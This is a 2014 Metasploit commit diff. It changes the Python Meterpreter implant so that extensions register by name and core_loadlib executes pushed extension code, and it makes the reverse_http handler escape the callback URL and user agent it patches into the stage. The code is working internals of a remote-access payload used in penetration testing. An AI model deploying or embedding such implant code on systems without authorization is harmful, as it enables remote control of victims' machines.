Escape inserted vars and fix core_loadlib

zeroSteiner · zeroSteiner · commit e562883ba906 · 2014-11-15T15:06:18.000-05:00
diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py
@@ -501,6 +501,8 @@ class RTATTR(ctypes.Structure):
 IFA_ADDRESS    = 1
 IFA_LABEL      = 3
 
+meterpreter.register_extension('stdapi')
+
 def calculate_32bit_netmask(bits):
 	if bits == 32:
 		return 0xffffffff
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
@@ -313,6 +313,7 @@ def __init__(self, socket=None):
 			self.driver = 'tcp'
 		elif HTTP_CONNECTION_URL:
 			self.driver = 'http'
+		self.last_registered_extension = None
 		self.extension_functions = {}
 		self.channels = {}
 		self.interact_channels = []
@@ -331,6 +332,10 @@ def driver_init_http(self):
 		urllib.install_opener(opener)
 		self._http_last_seen = time.time()
 
+	def register_extension(self, extension_name):
+		self.last_registered_extension = extension_name
+		return self.last_registered_extension
+
 	def register_function(self, func):
 		self.extension_functions[func.__name__] = func
 		return func
@@ -485,15 +490,19 @@ def _core_loadlib(self, request, response):
 		data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
 		if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
 			return ERROR_FAILURE
-		preloadlib_methods = list(self.extension_functions.keys())
+
+		self.last_registered_extension = None
 		symbols_for_extensions = {'meterpreter':self}
 		symbols_for_extensions.update(EXPORTED_SYMBOLS)
 		i = code.InteractiveInterpreter(symbols_for_extensions)
 		i.runcode(compile(data_tlv['value'], '', 'exec'))
-		postloadlib_methods = list(self.extension_functions.keys())
-		new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
-		for method in new_methods:
-			response += tlv_pack(TLV_TYPE_METHOD, method)
+		extension_name = self.last_registered_extension
+
+		if extension_name:
+			check_extension = lambda x: x.startswith(extension_name) or x.startswith('channel_open_' + extension_name)
+			lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
+			for method in lib_methods:
+				response += tlv_pack(TLV_TYPE_METHOD, method)
 		return ERROR_SUCCESS, response
 
 	def _core_shutdown(self, request, response):
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
@@ -201,11 +201,15 @@ def on_request(cli, req, obj)
         blob = ""
         blob << obj.generate_stage
 
+        var_escape = lambda { |txt|
+          txt.gsub('\\', '\\'*8).gsub('\'', %q(\\\\\\\'))
+        }
+
         # Patch all the things
-        blob = blob.sub("HTTP_CONNECTION_URL = None", "HTTP_CONNECTION_URL = '#{url}'")
-        blob = blob.sub("HTTP_EXPIRATION_TIMEOUT = 604800", "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
-        blob = blob.sub("HTTP_COMMUNICATION_TIMEOUT = 300", "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
-        blob = blob.sub("HTTP_USER_AGENT = None", "HTTP_USER_AGENT = '#{datastore['MeterpreterUserAgent']}'")
+        blob.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(url)}'")
+        blob.sub!('HTTP_EXPIRATION_TIMEOUT = 604800', "HTTP_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
+        blob.sub!('HTTP_COMMUNICATION_TIMEOUT = 300', "HTTP_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
+        blob.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(datastore['MeterpreterUserAgent'])}'")
 
         resp.body = blob
 
